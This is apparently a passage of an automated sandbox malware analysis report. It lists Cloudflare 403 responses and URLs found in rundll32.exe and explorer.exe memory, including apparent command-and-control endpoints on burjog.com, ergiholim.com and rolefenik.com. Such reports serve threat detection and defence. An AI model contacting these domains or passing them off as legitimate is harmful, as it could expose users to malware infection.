            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2FKxvvLq0z1pnKTbamai0hYAGNMx2URWKEW5LmRezYKImECxHMNyTXb%2BB7J5%2FwFx7Z%2BvzLkSNPhL6hdfM1xfIx32dWXoe8fUu%2B6vaIdT5yxgT0LifnIojDNCJ6TWAVG1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072b5dff8aff3-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=144356&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=17493&cwnd=32&unsent_bytes=0&cid=bfb7b3b6bc45a5b3&ts=626&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cSCNW9txY29WhwKOJ0uSgGvWJ82zsiHsaSjWWDbeypUyYa2%2BiH70zzO%2F5AepQLci1s0SefYitC1PmzpjdhZ%2FpGeI7FuZYk8nPMmyYjOlEAgA57hRE%2Fy1G5%2FJGW%2FpXiQa"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072bd1d646c80-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1962&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=1483606&cwnd=251&unsent_bytes=0&cid=06bcf1c192d78d40&ts=406&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Io%2BxfrBrKy5I6J13uaLBQm%2BZUKBKUvKw6vD9nuvhChW5CL5yklHSuzH9yp9TFAK6jlgSxabaGu8UqoVDwuEwkkHDA%2B1F52oPI3aGtto9EcywPZVHn1us0KwRNRRBf5sL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072c58a6ce387-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=141013&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=20577&cwnd=32&unsent_bytes=0&cid=d270895326dc000b&ts=818&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vwx71jEP%2Bnq%2BzAbVTEnchr4c5SrwZxAw8ImT1K%2F2YBZIPGr5DO%2BfForNYG%2BwHrqfLEgJJXsuWuBO%2FSZMeFXbuAUXzGXXIeuVQhZXe%2BrGq2rsJ2idB0eaTQrz058HNyCo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072d1bb3bd79c-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=141215&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=20516&cwnd=32&unsent_bytes=0&cid=65f56815b85c26a3&ts=708&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWgU9G4AQi5q94uNvw%2B4XK6ZJcqBKf1jI4j0AkqRA%2BXM8l1rM8ac7lpNzGhbJ91oSf2QcVmjN98KNw4OqeqT%2Fejp%2FTwQfdyoseRUwndK2eyUd7c5GArcFIjQfSpgcpcG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072daeebfe37e-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=167898&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=17512&cwnd=32&unsent_bytes=0&cid=e31ee755400a3862&ts=596&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ILsKwzIq6gbDJ4%2F66sgrnxje5FIUfgW1W%2BWB8IcNF%2BiKXLMAdgDE20dGWKMfQWyMH%2FCZqP8%2B%2Bc4AVU3IPEucSHvLO5bzgobpS0wPjJqZp2QMR4JtMOz%2BxCQcUzAMepWH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072e3fc62d79c-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=146570&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20332&cwnd=32&unsent_bytes=0&cid=8b622a9829de32b7&ts=501&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KNz%2BwL5jt40WawpRVcr9nBci4YrOidndGEDRCzAEro1FUvYqV49pG5P2qf4v3eSgypbVebFdPnjs3LVTKAYi6K2Ynmk02zVeRYUbB%2BBO3FxErv1ToDJHh4rO%2BO2g7maZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072edc9a37374-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=129834&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=22287&cwnd=32&unsent_bytes=0&cid=1740d836c5f71e5f&ts=776&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pswzgrdyDrsJIPX3dZ2LvrTG8xG8knbsZ5QD6m3x0cQaJM7PwZ2%2FOjnecOo1zx1BDqJGO%2BZOXy4ltUSCnbBEKY57071ar49gvf%2F3G7PXUj%2FDgTugD09g96w%2FR%2FHxJv8P"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072f85989e36b-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=139980&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20059&cwnd=32&unsent_bytes=0&cid=e33bb2b48837105f&ts=505&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rjae4mD%2BxOGAyipArYHkptJw9h%2FLNTpN88F791NgZ6QQ2ADVt%2BsjgaVXTcdMhrwRwYu3351lvFnGBYxWx9H%2BBqcxcOn5sSTjV7tOIrDk3SBBKpH%2BzdU9S5CUjF9wXRUG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20730148dcd768-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=156589&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=18186&cwnd=32&unsent_bytes=0&cid=137fed4dc9920c19&ts=575&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2BJmJxP6Ps0agBrkSyQyry0%2F89gwUBxy3%2FI7dtX1kFSohIGH5r9QnfjOYbXNKKORvGnhgQhjjq%2FgbgEmAAJgE89H3kjREZTi0PJT7hf2yH4IXhKgThxt2oDhwZ3r5rpf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207308fd042c87-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1340&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2154761&cwnd=228&unsent_bytes=0&cid=9241388e304601e6&ts=394&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GT21G0dGeeA0ByYvdUGiiYKVcqVQ8kfwIikzxsJy8UANjF6ZlDVtTWnOgs84m%2F8LKvWvgYk%2FkETiHhtnlJA6kOzEeNRloLBilIX5QEEmB6nwikz3K1g64qzxWe4OdTSr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073107dcbc971-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=39825&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=72679&cwnd=32&unsent_bytes=0&cid=03bb5b8cf26572a9&ts=486&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VSOXVeC52kxi%2FRdy5quxEBnPOcwY2%2BiwczSgXYxF0GnIwMaqPDUsarstAnApM51Oyl%2F7Ngo%2BBfbPjcOeN8%2Fp1d%2BsHWkEFsaS5J4VXSsTSOkHLpjtswmfDsvZgaUGttnU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207318bfd8d788-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=134927&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=21447&cwnd=32&unsent_bytes=0&cid=286837213be96280&ts=968&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yQGNoPJj4b6FfOmS%2BYwm1LNKHnm6JlviO4g3wRHlASmckX7NPt%2FA%2BVt4QjfeL24KVZbzwsRU8N4%2BgzwqR9DUIyYhdc%2BoetczZuqiNtLbdg%2FAHEC68rQDWjlY4ktlHmZc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20732468f9d78b-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=137605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=21075&cwnd=32&unsent_bytes=0&cid=73ddc33a4c9826a8&ts=553&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h492SEKam0kHZsn9UuyKimtDKEKIP36gJCpHdbdJxynH2DJf%2FGr%2BU7bbaqEayy%2Fs44XC4jEDRVPHYp6%2FpCN3Y4WZMzQbBWhQ%2FVo9O1wkmSmFgYbeUdYX7npLSQ3xJBeW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20732dcc24f675-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=138745&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=18395&cwnd=32&unsent_bytes=0&cid=28bb09f686d417be&ts=553&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UgOy7b8h9ZPo%2BOPQ9nXPf2tUt8QWHOYqWaHtpM2DervZ9RJNJLPG43P07W1FB7n683mGTThlhTjYOHHs%2BHGyDuhpp6c%2B4xr74XXiKOL1NaAXJbaKfaJKBf2jx6SpCLGL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207336ffe1d74b-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=131061&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=22098&cwnd=32&unsent_bytes=0&cid=4501c5613c3f94c9&ts=615&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WCZI4zr%2FOT5u9EnGAYUPHs%2BuvBjmDNi0bwxRw2WS8t0i37k04eRVN%2FLwKWX8VMOEJm2E8C8X%2FAU%2BtwvrFxlHtvruMZbP4frLcp5JZUjoAvNTPH8KJQVvsZmq4Iwl162"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20733fbb226bc8-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=981&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2861660&cwnd=235&unsent_bytes=0&cid=7f679857cbd07a7a&ts=417&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=whIsG8DA0uyqXXPGqgI0f6E9Knl38Mk9pax1SjHnVCAGboHXedOX227srRQY2iGR3rm9rMu1hGagWeWOvtkSBAwGBLsZFcV6lW915U%2FbYC7bWJQg7fxg9HcUKUj98Zgp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073484b78e3a5-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=138035&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=19439&cwnd=32&unsent_bytes=0&cid=f4bd36db14e8d446&ts=831&x=0"
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com/
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/
            Source: rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/der
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/matrix.php
            Source: rundll32.exe, 00000006.00000002.4567543964.00000293119F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/matrix.phpN
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/matrix.phpdOga
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/matrix.phpwOva
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/matrix.php~
            Source: rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/neo.php
            Source: rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/neo.phpAHJ
            Source: rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/neo.phpjJ
            Source: rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/neo.phptJZa
            Source: rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/pankihoy.php
            Source: rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/pankihoy.phpCryptographyQJga
            Source: explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/S
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4588467041.000000000BCFD000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3080227376.00000000032B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/test/
            Source: explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/test/_
            Source: explorer.exe, 00000008.00000003.3080227376.00000000032B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/test/bleSyncOnActivityFeed
            Source: explorer.exe, 00000008.00000002.4581549359.00000000098AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/test/c
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/test/g
            Source: explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/test/p
            Source: explorer.exe, 00000008.00000000.2242782012.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3083287941.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980843458.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000C086000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
            Source: explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
            Source: explorer.exe, 00000008.00000000.2242782012.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3083287941.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980843458.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000C086000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
            Source: explorer.exe, 00000008.00000000.2242782012.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/K
            Source: explorer.exe, 00000008.00000003.3080227376.00000000032B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/X
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/c
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/est/
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4591202760.000000000C3E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/3
            Source: explorer.exe, 00000008.00000002.4581549359.00000000098AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/;
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/K
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/g
            Source: explorer.exe, 00000008.00000002.4590045694.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/~
